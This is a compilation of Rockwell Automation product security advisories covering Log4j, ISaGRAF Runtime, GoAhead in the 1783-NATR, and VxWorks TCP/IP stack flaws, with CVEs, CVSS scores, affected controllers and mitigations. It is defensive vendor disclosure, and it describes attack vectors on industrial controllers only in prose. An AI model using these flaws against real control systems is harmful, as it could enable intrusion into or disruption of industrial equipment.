	FactoryTalk Analytics DataView 3.02	Customers are required to upgrade from 3.02 to 3.03.01. Customers who have prior versions are required to upgrade to 3.02 first. It is recommended that customers not use DataFlow ML prior to version 4.00.00.
	Firewall Managed Support – Cisco Firepower Thread Defense (9300-FMAN, 9300-FSYS) Version 6.2.3 – 7.1.0	- For managed support customers, Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager. - For non-managed support customers, follow the mitigation instructions outlined by Cisco in CSCwa46963.
CVE-2021-45046, CVE-2021-4104, CVE-2019-17571	No products affected at this time.

Products Using Log4j 1.2
A number of Rockwell Automation products contain log4j libraries that may be detected by various scanning tools. These products do not use the JMSAppender nor the Socket Server and are not vulnerable to CVE-2021-4104 and CVE-2019-17571:

Products Evaluated and Not Affected	Suggested Actions
Factory Talk Analytics Data View 3.02.00, 3.03.00, 4.00.00, 4.01.00	No actions are needed as these products do not use the JMSAppender nor the Socket Server and therefore are not vulnerable.
Data Scheduler
FactoryTalk Augmented Modeler
Factory Talk Analytics Data Flow ML 2.01
Factory Talk Analytics Information Platform
Live Transfer 10.4, 11.0
Pavilion8
Factory Talk Analytics Security Provider 3.02.00, 3.03.00
PanelView 5000
FactoryTalk Production Centre (All Versions)
Factory Talk Pharma Suite (All Versions)
Studio 5000 View Designer	Studio 5000 does not use the JMSAppender nor the Socket Server and is not vulnerable.  Note: Studio 5000 consists of Studio 5000 Logix Designer and Studio 5000 View Designer.  If Logix Designer is the only component required, then View Designer version 8 or older may be removed by uninstalling it using the Windows Add/Remove Programs feature.  Uninstall “Studio 5000 View Designer”.  This will remove the log4j 1.2x library completely.  Alternatively, update Studio 5000 View Designer to version 9 or later which has updated log4j libraries that are not vulnerable.

General Security Guidelines

See the Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Industrial Security Services website for information on security services from Rockwell Automation to assess, protect, detect, respond and recover from incidents. These services include assessments, designs, implementations, industrial anomaly detection, patch management, and remote infrastructure monitoring and administration.

We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located in PN1354 – Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website .

If you have questions regarding this notice, please send an email to our product security inbox at: secure@ra.rockwell.com.

General Mitigations

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
Locate control system networks and devices behind firewalls and isolate them from the business network.
Visit links below for more mitigation techniques

ADDITIONAL LINKS

Critical

PN1567 | PN1567 | ISaGRAF Runtime Affected by Multiple Vulnerabilities

Published Date:

December 30, 2021

Last Updated:

December 30, 2021

CVE IDs:

CVE-2020-25184, CVE-2020-25180, CVE-2020-25176, CVE-2020-25182, CVE-2020-25178

Products:

AADvance, ISaGRAF, Micro800

CVSS Scores:

9.1, 7.8, 5.3, 7.5, 6.7

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1.3

Revision History

Version 1.3 – March 19^th, 2024. Added AADvance Eurocard controller to Affected Products and Updated Suggested Actions for AADvance Eurocard controller

Version 1.2 - December 30, 2021. Updated Suggested Actions for AADvance® Controller version 1.40 and earlier

Executive Summary

Rockwell Automation received a report from Kaspersky regarding five vulnerabilities in ISaGRAF^® Runtime 4 and 5. If successfully exploited, these vulnerabilities may result in remote code execution, information disclosure, or denial of service.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

ISaGRAF Runtime 4.x and 5.x
The following Rockwell Automation products are based on ISaGRAF to design integrated automation solutions:

AADvance^® Controller version 1.32 and earlier
ISaGRAF Free Runtime in ISaGRAF6 Workbench version 6.6.8 and earlier
Micro800™ family, all versions

Vulnerability Details

CVE-2020-25176: Code Execution due to Relative Path Traversal
Some commands used by the ISaGRAF eXchange Layer (IXL) protocol perform various file operations in the file system. Since the parameter pointing to the file name is not checked for reserved characters, it is possible for a remote attacker authenticated on the IXL protocol to traverse an application’s directory, which could lead to remote code execution.

CVSS v3.1 Base Score: 9.1/10 [CRITICAL]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2020-25184: Information Disclosure due to cleartext storage of passwords in a file and memory
ISaGRAF Runtime stores the password in plaintext in a file which is located in the same directory with the executable file. ISaGRAF Runtime reads the file and saves the data in a variable without any additional modification. A local, unauthenticated attacker could compromise the user passwords resulting in information disclosure.

CVSS v3.1 Base Score: 7.8/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2020-25178: Information Disclosure due to Cleartext Transmission of Information
ISaGRAF Workbench communicates with ISaGRAF Runtime using TCP/IP. The communication protocol provides various file system operations as well as uploading applications. Data is transferred over this protocol unencrypted, which could allow a remote, unauthenticated attacker to upload, read and delete files.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CCVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2020-25182: Code Execution due to Uncontrolled Search Path Element
ISaGRAF Runtime searches and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects Microsoft Windows systems running ISaGRAF Runtime.

CVSS v3.1 Base Score: 6.7/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2020-25180: Information Disclosure due to Hard-coded Cryptographic Key
ISaGRAF Runtime includes the functionality of setting a password which is required to execute privileged commands. The password value passed to ISaGRAF Runtime is the result of encryption performed with a fixed key value using the Tiny Encryption Algorithm (TEA) on a password that has been entered or saved. A remote, unauthenticated attacker could pass his own encrypted password to the ISaGRAF 5 Runtime, which may result in information disclosure on the device.

CVSS v3.1 Base Score: 5.3/10 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software and are directed towards risk mitigation. Customers are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense-in-depth strategy.

Vulnerability	Affected Products	Suggested Mitigations
CVE-2020-25176	AADvance Controller ISaGRAF5 Runtime Micro800 family AADvance Eurocard controller	Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and AADvance Controller firmware to version 1.041.3 Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed. For ISaGRAF, customers are encouraged to restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF refer to product documentation. Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use. For AADvance controllers, Customers should update to version 1.041.3 to mitigate vulnerability. For Micro800 family, to reduce risk, customers are encouraged to help protect the controller with a password. Additionally, customers deploying Micro870®, Micro850®, or Micro830® controllers are encouraged to put the controller's mode switch to "RUN". Customers are encouraged to restrict or block traffic on TCP 44818 from outside the industrial control system network zone. Customers should also confirm they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. For more information on the TCP/UDP ports used by Rockwell Automation products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products . Rockwell Automation recommends upgrading to AADvance Eurocard Controller firmware to version 1.041
CVE-2020-25178	AADvance Controller ISaGRAF5 Runtime Micro800 family AADvance Eurocard controller	Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and AADvance Controller firmware to version 1.041.3. Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed. Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use. Rockwell Automation recommends upgrading to AADvance Eurocard Controller firmware to version 1.041
CVE-2020-25182	ISaGRAF5 Runtime	Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00. Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed. Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use.
CVE-2020-25184	AADvance Controller ISaGRAF5 Runtime AADvance Eurocard controller	Rockwell Automation recommends upgrading to ISaGRAF Runtime 5 version 5.72.00 and AADvance Controller firmware to version 1.041.3. Customers should confirm that the least-privilege user principle is followed, and user/service account access to Runtime's folder location is granted with a minimum number of rights as needed. For ISaGRAF, restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF refer to product documentation. Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use. For AADvance controllers, Customers should update to version 1.041.3 to mitigate this vulnerability. Rockwell Automation recommends upgrading to AADvance Eurocard Controller firmware to version 1.041
CVE-2020-25180	AADvance Controller ISaGRAF5 Runtime AADvance Eurocard controller	To reduce risk, customers should confirm they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. See the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense in depth strategies. Customers should consider using proper network infrastructure controls, such as firewalls, UTM devices, VPN, or other security appliances. For ISaGRAF, restrict or block traffic on TCP 1131 from outside of the industrial control system network zone. For more information on the TCP/UDP ports used by ISaGRAF refer to product documentation. Since ISaGRAF 5 Runtime is provided to a customer as a development kit, implementing least-privilege may vary from implementation to implementation based on the hardware in use. For AADvance controllers, Customers should update to version 1.041.3 to mitigate this vulnerability. Rockwell Automation recommends upgrading to AADvance Eurocard Controller firmware to version 1.041

General Security Guidelines

Use proper network infrastructure controls, such as firewalls, to help ensure that any communication protocols from unauthorized sources are blocked.
Block traffic to all protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to ports using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports, refer to the product documentation.
Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
Confirm that the least-privilege user principle is followed, and user/service account access to shared resources is only granted with a minimum number of rights as needed.
Do not open untrusted .isasln and .acfproj files with ISaGRAF6 Workbench.
Do not click on or open URL links from untrusted sources.
Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Critical

PN1580 | PN1580 | GOAhead Web Server vulnerability in 1783-NATR

Published Date:

December 16, 2021

Last Updated:

December 16, 2021

CVE IDs:

CVE-2019-5097, CVE-2019-5096

Products:

Network Address Translation (NAT) Device

CVSS Scores:

7.5, 9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.2

Revision History

Version 1.0 – December 15, 2021
Version 1.1 - December 16, 2021: Updated Suggested Actions
Version 1.2 – January 21, 2021: Updated Suggested Actions To Mitigate

Executive Summary

Rockwell Automation received a report from Cisco® Talos™ Researchers regarding two vulnerabilities in the 1783-NATR. If successfully exploited, these vulnerabilities may result in remote code execution on the device through the GoAhead web server and a denial-of-service condition.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Detailed Information

CVE-2019-5096: GoAhead web server allows unauthenticated HTTP requests that may result in remote code execution

A remote unauthenticated attacker may be able to send a specially crafted HTTP request that can lead to a use-after-free condition during the processing of this request that can be used to corrupt heap structures, which would result in the ability for the attacker to execute remote code execution.

CVSS v3.1 Base Score: 9.8/10[Critical}

CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-5097: GoAhead web server allows specially crafted HTTP requests that may result in a denial-of-service for the device.

A remote unauthenticated attacker may be able to send a specially crafted HTTP request that can lead to an infinite loop in the process. The request can be unauthenticated in the form of GET or POSTS requests and does not require the requested resource on the server, which would lead to a denial-of-service attack on the device.

CVSS v3.1 Base Score: 7.5/10 [High]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Affected Products

1783-NATR version 1.005

Risk Mitigation & User Action

Customers using the affected 1783-NATR are encouraged to update to an available firmware revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability	Suggested Actions
CVE-2019-5096	Upgrade firmware to version 1.006 to mitigate this vulnerability.
CVE-2019-5097	Upgrade firmware to version 1.006 to mitigate this vulnerability.

General Security Guidelines

Network-based vulnerability mitigations for embedded products

Utilize proper network infrastructure controls, such as firewalls, to help ensure that HTTP port 80 from unauthorized sources are blocked.
Consult the product documentation for specific features, such as a hardware mode switch setting, to which may be used to block unauthorized changes, etc.
Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to Port#80 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products .

General mitigations

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.

Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/security notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

Additional Links

Critical

PN1494 | VxWorks Vulnerabilities affect Programmable Automation Controllers, EtherNet/IP Communication Modules, I/O Modules, Kinetix 6500 Servo Drive, High-Frequency RFID Interface Block

Published Date:

August 11, 2021

Last Updated:

October 04, 2024

CVE IDs:

CVE-2019-12260, CVE-2019-12265, CVE-2019-12257, CVE-2019-12258, CVE-2019-12256, CVE-2019-12255, CVE-2019-12263, CVE-2019-12262, CVE-2019-12264, CVE-2019-12261, CVE-2019-12259

Products:

Network Address Translation (NAT) Device, 5069 Compact I/O, 1732E ArmorBlock I/O, Ethernet/IP Connected Products, High-Frequency RFID, 1756 ControlLogix I/O

CVSS Scores (v3.1):

9.8, 8.8, 7.5, 8.1, 6.3, 7.1, 5.4

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Revision History

Revision Number

1.0

Revision History

October 1, 2024 – Version 1.6 Updated Affected Catalog Numbers and Suggested Actions for ControlLogix EtherNet/IP Module

02-March-2020 - Version 1.4. Updated suggested risk mitigation & user actions.
11-November-2020 - Version 1.3. Corrected suggested actions.
16-November-2019 - Version 1.2. Updated Advisory.
30-July-2019 - Version 1.0. Initial Release.

Revision History

Revision Number

1.1

Revision History

09-October-2019 - Updated Advisory

On October 1st, 2019, it was reported (ICS-CERT Advisory: ICSA-19-274-01) that the series of TCP/IP stack vulnerabilities originally reported as impacting VxWorks systems were now found to impact additional real-time operating system vendors including ENEA, Green Hills Software, ITRON, and IP Infusion. Rockwell Automation is not aware of any products affected by the new advisory. An investigation is ongoing and this advisory will be updated when the investigation is complete.

Revision History

Revision Number

1.2

Revision History

16-November-2019 - Updated Advisory

Rockwell Automation completed an investigation into the additional, impacted real-time operating systems reported in ICS-CERT Advisory: ICSA-19-274-0, and concluded that no products are affected by this new advisory.

Revision History

Revision Number

1.3

Revision History

2-November-2020. Corrected suggested actions.

The Rockwell Automation PSIRT has updated the suggested actions for the for the ControlLogix 5580 and CompactLogix. Please refer to the Risk Mitigation & User Action section below for more information.

Revision History

Revision Number

1.4

Revision History

02-March-2020 - Version 1.4. Updated suggested risk mitigation & user actions.

The Rockwell Automation PSIRT has updated the suggested actions for the for the ControlLogix 5580, GuardLogix 5580, CompactLogix 5380, and CompactLogix 5380. Please refer to the Risk Mitigation & User Action section below for more information.

Revision History

Revision Number

1.5

Revision History

04-August-2021 – Version 1.5 Updated firmware available for 1747-AENTR and 1769-AENTR

Revision History

1.6

October 1, 2024 – Updated Affected Catalog Numbers and Suggested Actions for ControlLogix EtherNet/IP Module

Executive Summary

Armis, an Internet of Things (IoT) security firm, reported a total of eleven vulnerabilities to WindRiver that affect VxWorks, a real-time operating system (RTOS) utilized by many different technology vendors, including Rockwell Automation™. These vulnerabilities, if successfully exploited, may result in several impacts ranging from packet information disclosure to allowing a threat actor to execute arbitrary code on the targeted device.

Not every VxWorks vulnerability applies to every impacted product family. Please see the table under Affected Products for a full list of the potentially affected Rockwell Automation products and the corresponding VxWorks vulnerabilities, which are identified by their Common Vulnerabilities and Exposures (CVE) ID.

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available. Please subscribe to updates to this advisory and the Industrial Security Advisory Index (Knowledgebase ID 54102) to stay notified.

Customers using potentially affected products are encouraged to evaluate their own systems and apply the appropriate mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products

Product Family

Catalogs

CVE-2019-12255

CVE-2019-12256

CVE-2019-12257

CVE-2019-12258

CVE-2019-12259

CVE-2019-12260

CVE-2019-12261

CVE-2019-12262

CVE-2019-12263

CVE-2019-12264

CVE-2019-12265

CompactLogix™ 5480 (EPIC controller)

5069-L4

x

Compact 5000™ I/O EtherNet/IP Adapter

5069-AEN2TR

x

ControlLogix® 5580 (+ GuardLogix®)

1756-L8

x

CompactLogix Compact GuardLogix 5380

5069-L3
5069-L3S2

x

CompactLogix 5370

1769-L3

x

CompactLogix GuardLogix 5370

1769-L3S

x

CompactLogix 5370

1769-L2

x

CompactLogix 5370

1769-L1

x

ControlLogix EtherNet/IP Module

1756-EN2TSC/A

x

ControlLogix EtherNet/IP Module

1756-EN2TSC/B

x

ControlLogix EtherNet/IP Module

1756-EN2T/C

x

ControlLogix EtherNet/IP Module

1756-EN2T/D

x

ControlLogix EtherNet/IP Module

1756-EN4TR

x

ControlLogix EtherNet/IP Module

1756-EN2TP/A

x

ControlLogix EtherNet/IP Module

1756-EN2TR/B

x

ControlLogix EtherNet/IP Module

1756-EN2TR/C

x

ControlLogix EtherNet/IP Module

1756-EN3TR/A

x

ControlLogix EtherNet/IP Module

1756-EN3TR/B

x

X

ControlLogix EtherNet/IP Module

1756-EN2F/B

x

ControlLogix EtherNet/IP Module

1756-EN2F/C

x

ControlLogix EtherNet/IP Module

1756-EN2TRXT

x

1783-NATR, Network Address Translation Router

1783-NATR

x

ArmorBlock® I/O Modules

1732E-8CFGM8R

x

ArmorBlock I/O Modules

1732E-IB8M8SOER

x

ArmorBlock I/O Modules

1732E-IF4M12R

x

ArmorBlock I/O Modules

1732E-IR4M12R

x

ArmorBlock I/O Modules

1732E-IT4M12R

x

ArmorBlock I/O Modules

1732E-OB8M8SR

x

ArmorBlock I/O Modules

1732E-OF4M12R

x

ArmorBlock I/O Modules

1732E-8IOLM12R

x

Bulletin 56RF High-Frequency RFID

56RF-IN-IPD22

x

Bulletin 56RF High-Frequency RFID

56RF-IN-IPD22A

x

Bulletin 56RF High-Frequency RFID

56RF-IN-IPS12

x

SLC™ 500 EtherNet/IP Adapter

1747-AENTR

x

CompactLogix E/IP Adapter

1769-AENTR

x

Kinetix® 6200 Servo Multi-axis Drives

2094-SE02F-M00-Sx

x

Kinetix® 6500 Servo Multi-axis Drives

2094-EN02D-M01-Sx

x

Vulnerability Details

Vulnerability #1: TCP Urgent Pointer = 0 leads to integer underflow
A remote, unauthenticated threat actor could either hijack an existing TCP session or establish a new TCP session to inject malformed TCP packets to the device, resulting in a denial of service condition to the application, or could allow the execution of arbitrary code on the affected device. Products implementing non-executable memory mitigations reduce the risk of exploitation.

CVE-2019-12255 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #2: Stack overflow in the parsing of IPv4 packets’ IP options
A remote, unauthenticated threat actor could send invalid IPv4 packets, resulting in a crash to the task that receives or transmits any Ethernet packets, or could allow the execution of arbitrary code on the affected device.

CVE-2019-12256 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #3: Heap overflow in DHCP Offer/ACK parsing inside ipdhcpc
A remote, unauthenticated threat actor could utilize this vulnerability overwrite the heap, which may result in a crash later on when a task requests memory from the heap.

CVE-2019-12257 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned.

Vulnerability #4: Denial of Service (DoS) of TCP connection via malformed TCP options
A remote, unauthenticated threat actor who is able to figure out the source and destination TCP port and IP addresses of a session could potentially inject invalid TCP segments which cause the TCP session to be reset, resulting in a crash of the application that is reading from the affected socket.

CVE-2019-12258 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned.

Vulnerability #5: DoS via NULL dereference in IGMP parsing
An unauthenticated threat actor on the same Local Area Network (LAN) as the victim system may use this vulnerability to cause a Denial of Service condition to the task that receives and transmits Ethernet packets.

CVE-2019-12259 has been assigned to this vulnerability. A CVSS v3 base score of 6.3 has been assigned.

Vulnerability #6: TCP Urgent Pointer state confusion caused by malformed TCP AO option
A threat actor could utilize this vulnerability to cause a buffer overflow and result in a crash the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12260 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #7: TCP Urgent Pointer state confusion during connect() to a remote host
A threat actor could utilize this vulnerability to cause a buffer overflow and result in a crash the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12261 has been assigned to this vulnerability. Rockwell Automation evaluated the vulnerability using the Common Vulnerability Scoring System (“CVSS”) v3.0. A CVSS v3 base score of 8.8 has been assigned.

Vulnerability #8: Handling of unsolicited Reverse Address Resolution Protocol (ARP) replies
A threat actor on the same LAN as the victim system can send reverse-ARP responses to the victim system and assign IPv4 addresses to the target, which could potentially result in network connectivity issues if any of the ARP values collide.

CVE-2019-12262 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned.

Vulnerability #9: TCP Urgent Pointer state confusion due to race condition
A threat actor could utilize this vulnerability to cause a buffer overflow and result in a crash the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12263 has been assigned to this vulnerability. A CVSS v3 base score of 8.1 has been assigned.

Vulnerability #10: Logical flaw in IPv4 assignment by the ipdhcpc DHCP client
A threat actor on the same LAN as the victim system could hijack a DHCP client session which may result in the victim incorrectly assigning a multicast IP address that originated from the threat actor.

CVE-2019-12264 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned.

Vulnerability #11: IGMP information leak via IGMPv3 specific membership report
This vulnerability may allow a threat actor on the same LAN as the victim system to transmit packets to the network that may contain information from packets that were previously sent/received by the network stack.

CVE-2019-12265 has been assigned to this vulnerability. A CVSS v3 base score of 5.4 has been assigned.

Risk Mitigation & User Action

Customers using affected products are encouraged evaluate their risk and when possible, combine the following risk mitigation strategies provided below with the general security guidelines.

Ensure all devices are placed behind an external firewall and add a rule to drop or block any TCP segment where the “URG-flag” is set.
Take the suggested actions for the products in the table below:

Product

Catalog Numbers

Suggested Actions

CompactLogix™ 5480 (EPIC Controller)

5069-L4

Upgrade to firmware version 32.013 (Download) or later.

Compact 5000™ I/O EtherNet/IP Adapter

5069-AEN2TR

Will not be patched. Suggested action is to migrate to the 5069-AENTR.

ControlLogix EtherNet/IP Module

1756-EN2TSC/A
1756-EN2TSC/B

Will not be patched as it has been discontinued.

ControlLogix EtherNet/IP Module

1756-EN2T/D
1756-EN2TP/A

1756-EN2TR/C
1756-EN2F/C
1756-EN4TR

1756-EN3TR/B

Upgrade to firmware version 11.002 (Download) or later.
(1756-EN4TR only) Upgrade to firmware version 3.001 (Download) or later.

ControlLogix EtherNet/IP Module

1756-EN2T/C

1756-EN2F/B

1756-EN2TR/B

1756-EN3TR/A

No fix . Upgrade to 1756-EN2T/D, 1756-EN2TP/A, 1756-EN2TR/C, 1756-EN2F/C
1756-EN4TR, or 1756-EN3TR/B

ControlLogix 5580

1756-L8

Upgrade to firmware version 30.015 (Download) or version 31.013 (Download) or version 32.013 (Download) or later.

GuardLogix 5580

1756-L8S

Upgrade to firmware version 31.013 (Download) or version 32.013 (Download) or later.

CompactLogix 5380

5069-L3

Upgrade to firmware version 30.015 (Download) version 31.013 (Download) or version 32.013 (Download) or later.

Compact GuardLogix 5380

5069-L3S2

Upgrade to firmware version 31.013 (Download) or version 32.013 (Download) or later.

CompactLogix 5370

1769-L3
1769-L2
1769-L1

Upgrade to firmware version 32.013 (Download) or later.

CompactLogix GuardLogix 5370

1769-L3S

Upgrade to firmware version 28.015 (Download) or version 32.013 (Download) or later.

1783-NATR, Network Address Translation Route

1783-NATR

Upgrade to firmware version 1.005 (Download) or later.

Kinetix® 6200 Servo Multi-axis Drives

2094-SE02F-M00-Sx

Upgrade to firmware version 1.050 (Download) or later.

Kinetix® 6500 Servo Multi-axis Drives

2094-EN02D-M01-Sx

Upgrade to firmware version 3.005 (Download) or later.

SLC 500 EtherNet/IP Adapter

1747-AENTR

Upgrade to firmware version 2.003 (Download) or later.

CompactLogix E/IP Adapter

1769-AENTR

Upgrade to firmware version 1.002 (Download) or later.

General Security Guidelines

Block all traffic to EtherNet/IP or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222, Port# 44818, Port #80, and Port #161 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation products, see Knowledgebase Article ID 898270.
Use trusted software, software patches, anti-virus/anti-malware programs and interact only with trusted web sites and attachments.
Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Please recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (secure@ra.rockwell.com). Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

ADDITIONAL LINKS

High

PN1575 | PN1575 | Interniche Vulnerabilities present in Rockwell Automation Products – “INFRA:HALT”

Published Date:

August 09, 2021

Last Updated:

September 09, 2025

CVE IDs:

CVE-2020-25767, CVE-2020-35684, CVE-2020-35685, CVE-2021-31400, CVE-2021-36762, CVE-2020-25926, CVE-2021-31226, CVE-2021-31401, CVE-2021-31228, CVE-2020-25928, CVE-2020-25927, CVE-2021-31227, CVE-2020-27565, CVE-2020-35683

Products:

AADvance, 1715 Distributed I/O, 1715 Redundant I/O, ArmorStart

CVSS Scores:

8.2, 4.0

